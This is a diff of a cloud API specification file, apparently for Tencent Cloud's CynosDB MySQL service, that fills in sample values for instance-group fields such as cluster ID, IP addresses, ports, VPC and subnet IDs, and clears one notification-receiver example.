4040
  "title": "示例"
4041
4041
  }
4042
4042
  ],
@@ -7146,7 +7146,7 @@
7146
7146
  {
7147
7147
  "disabled": false,
7148
7148
  "document": "用户appId",
7149
- "example": "",
7149
+ "example": "251232125",
7150
7150
  "member": "int64",
7151
7151
  "name": "AppId",
7152
7152
  "output_required": true,
@@ -7156,7 +7156,7 @@
7156
7156
  {
7157
7157
  "disabled": false,
7158
7158
  "document": "集群ID",
7159
- "example": "",
7159
+ "example": "cynosdbmysql-dkq0t36x",
7160
7160
  "member": "string",
7161
7161
  "name": "ClusterId",
7162
7162
  "output_required": true,
@@ -7166,7 +7166,7 @@
7166
7166
  {
7167
7167
  "disabled": false,
7168
7168
  "document": "创建时间",
7169
- "example": "",
7169
+ "example": "2024-12-02 10:59:44",
7170
7170
  "member": "string",
7171
7171
  "name": "CreatedTime",
7172
7172
  "output_required": true,
@@ -7176,7 +7176,7 @@
7176
7176
  {
7177
7177
  "disabled": false,
7178
7178
  "document": "删除时间",
7179
- "example": "",
7179
+ "example": "2024-12-22 10:59:44",
7180
7180
  "member": "string",
7181
7181
  "name": "DeletedTime",
7182
7182
  "output_required": true,
@@ -7186,7 +7186,7 @@
7186
7186
  {
7187
7187
  "disabled": false,
7188
7188
  "document": "实例组ID",
7189
- "example": "",
7189
+ "example": "cynosdbmysql-grp-nz02bc3j",
7190
7190
  "member": "string",
7191
7191
  "name": "InstanceGroupId",
7192
7192
  "output_required": true,
@@ -7196,7 +7196,7 @@
7196
7196
  {
7197
7197
  "disabled": false,
7198
7198
  "document": "状态",
7199
- "example": "",
7199
+ "example": "running",
7200
7200
  "member": "string",
7201
7201
  "name": "Status",
7202
7202
  "output_required": true,
@@ -7206,7 +7206,7 @@
7206
7206
  {
7207
7207
  "disabled": false,
7208
7208
  "document": "实例组(网络)类型。ha-ha组;ro-只读组;proxy-代理;singleRo-只读实例独占",
7209
- "example": "",
7209
+ "example": "ha",
7210
7210
  "member": "string",
7211
7211
  "name": "Type",
7212
7212
  "output_required": true,
@@ -7216,7 +7216,7 @@
7216
7216
  {
7217
7217
  "disabled": false,
7218
7218
  "document": "更新时间",
7219
- "example": "",
7219
+ "example": "2024-12-20 19:24:22",
7220
7220
  "member": "string",
7221
7221
  "name": "UpdatedTime",
7222
7222
  "output_required": true,
@@ -7226,7 +7226,7 @@
7226
7226
  {
7227
7227
  "disabled": false,
7228
7228
  "document": "内网IP",
7229
- "example": "",
7229
+ "example": "172.16.0.194",
7230
7230
  "member": "string",
7231
7231
  "name": "Vip",
7232
7232
  "output_required": true,
@@ -7236,7 +7236,7 @@
7236
7236
  {
7237
7237
  "disabled": false,
7238
7238
  "document": "内网端口",
7239
- "example": "",
7239
+ "example": "3306",
7240
7240
  "member": "int64",
7241
7241
  "name": "Vport",
7242
7242
  "output_required": true,
@@ -7246,7 +7246,7 @@
7246
7246
  {
7247
7247
  "disabled": false,
7248
7248
  "document": "外网域名",
7249
- "example": "",
7249
+ "example": "qy-cynosdbmysql-grp-nz02bc3j.sql.tencentcdb.com",
7250
7250
  "member": "string",
7251
7251
  "name": "WanDomain",
7252
7252
  "output_required": true,
@@ -7256,7 +7256,7 @@
7256
7256
  {
7257
7257
  "disabled": false,
7258
7258
  "document": "外网ip",
7259
- "example": "",
7259
+ "example": "81.71.200.7",
7260
7260
  "member": "string",
7261
7261
  "name": "WanIP",
7262
7262
  "output_required": true,
@@ -7266,7 +7266,7 @@
7266
7266
  {
7267
7267
  "disabled": false,
7268
7268
  "document": "外网端口",
7269
- "example": "",
7269
+ "example": "8723",
7270
7270
  "member": "int64",
7271
7271
  "name": "WanPort",
7272
7272
  "output_required": true,
@@ -7276,7 +7276,7 @@
7276
7276
  {
7277
7277
  "disabled": false,
7278
7278
  "document": "外网状态",
7279
- "example": "",
7279
+ "example": "running",
7280
7280
  "member": "string",
7281
7281
  "name": "WanStatus",
7282
7282
  "output_required": true,
@@ -7296,7 +7296,7 @@
7296
7296
  {
7297
7297
  "disabled": false,
7298
7298
  "document": "VPC的ID\n注意:此字段可能返回 null,表示取不到有效值。",
7299
- "example": "",
7299
+ "example": "vpc-95mugkpt",
7300
7300
  "member": "string",
7301
7301
  "name": "UniqVpcId",
7302
7302
  "output_required": true,
@@ -7306,7 +7306,7 @@
7306
7306
  {
7307
7307
  "disabled": false,
7308
7308
  "document": "子网ID\n注意:此字段可能返回 null,表示取不到有效值。",
7309
- "example": "",
7309
+ "example": "subnet-6zu506da",
7310
7310
  "member": "string",
7311
7311
  "name": "UniqSubnetId",
7312
7312
  "output_required": true,
@@ -7326,7 +7326,7 @@
7326
7326
  {
7327
7327
  "disabled": false,
7328
7328
  "document": "正在进行的任务",
7329
- "example": "",
7329
+ "example": "[\"taskSwitchVpc\"]",
7330
7330
  "member": "string",
7331
7331
  "name": "ProcessingTasks",
7332
7332
  "output_required": true,
@@ -7346,7 +7346,7 @@
7346
7346
  {
7347
7347
  "disabled": false,
7348
7348
  "document": "biz_net_service表id",
7349
- "example": "",
7349
+ "example": "172346",
7350
7350
  "member": "int64",
7351
7351
  "name": "NetServiceId",
7352
7352
  "output_required": true,
@@ -646,7 +646,7 @@
646
646
  {
647
647
  "disabled": false,
648
648
  "document": "接收用户信息\n注意:此字段可能返回 null,表示取不到有效值。",
649
- "example": "[{\"ReceiveGroup\":[{\"GroupName\":\"demoUserGrp\",\"GroupId\":\"196400\"}],\"EndReceiveTime\":\"23:59:59\",\"ReceiveName\":\"通知操作1\",\"SendChannel\":[8,4,32],\"StartReceiveTime\":\"00:00:00\",\"ReceiveUin\":[{\"UinName\":\"demoUser\",\"Uin\":\"100018983000\"}]}]",
649
+ "example": "",
650
650
  "member": "ReceiveInfo",
651
651
  "name": "ReceiveInfo",
652
652
  "output_required": false,